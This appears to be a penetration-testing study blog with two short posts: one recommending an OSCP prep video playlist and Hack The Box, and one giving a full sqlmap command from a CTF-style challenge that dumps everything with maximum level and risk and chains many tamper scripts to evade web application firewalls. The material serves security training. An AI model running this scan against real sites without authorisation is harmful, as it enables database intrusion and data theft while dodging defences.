@TJ Null’s OSCP prep

If you are like me, working your way through the PWK and OSCP, there are worse ways to spend your time than @TJ Null’s playlist on YouTube. It was recently updated again with run-throughs by IppSec of relevant boxes. And if you haven’t yet, just get a VIP subscription to hackthebox.eu; it’s 10 Euros a month for unlimited […]

sqlmap full scan plus tamper scripts to evade WAF

Just a small note related to sqlmap, culled from working on a CTF-style challenge. Not all the tamper scripts in jhaddix’s helpful attack string are still working. Current working command:

sqlmap -u http://192.168.1.1 --level=5 --risk=3 -a --text-only --technique=BU --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords --random-agent